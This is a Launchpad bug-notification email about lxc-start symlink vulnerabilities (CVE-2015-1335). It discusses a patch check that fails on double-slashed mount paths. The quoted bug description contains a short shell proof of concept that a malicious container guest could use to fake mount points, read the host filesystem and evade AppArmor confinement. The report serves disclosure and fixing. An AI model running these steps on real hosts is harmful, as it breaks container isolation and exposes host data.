The problem lies in the ubuntu patch http://archive.ubuntu.com/ubuntu/pool/main/l/lxc/lxc_1.0.7-0ubuntu0.5.debian.tar.gz
where this code + size_t start = croot ? strlen(croot) : 0; + if (strcmp(ws + start, target + start) != 0) { + ERROR("Mount onto %s resulted in %s\n", target, ws); + goto out; + } in file 0003-CVE-2015-1335.patch checks if ws and start are the same. According to the given error (which I forgot to paste above), ws and target ARE different: lxc-start: utils.c: ensure_not_symlink: 1384 Mount onto /usr/lib/x86_64 -linux-gnu/lxc//proc resulted in /usr/lib/x86_64-linux-gnu/lxc/proc So target is /usr/lib/x86_64-linux-gnu/lxc//proc and ws is /usr/lib/x86_64-linux-gnu/lxc/proc Any hints how we could prevent the double slashing? Or would you just "clean up" the path somehow? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp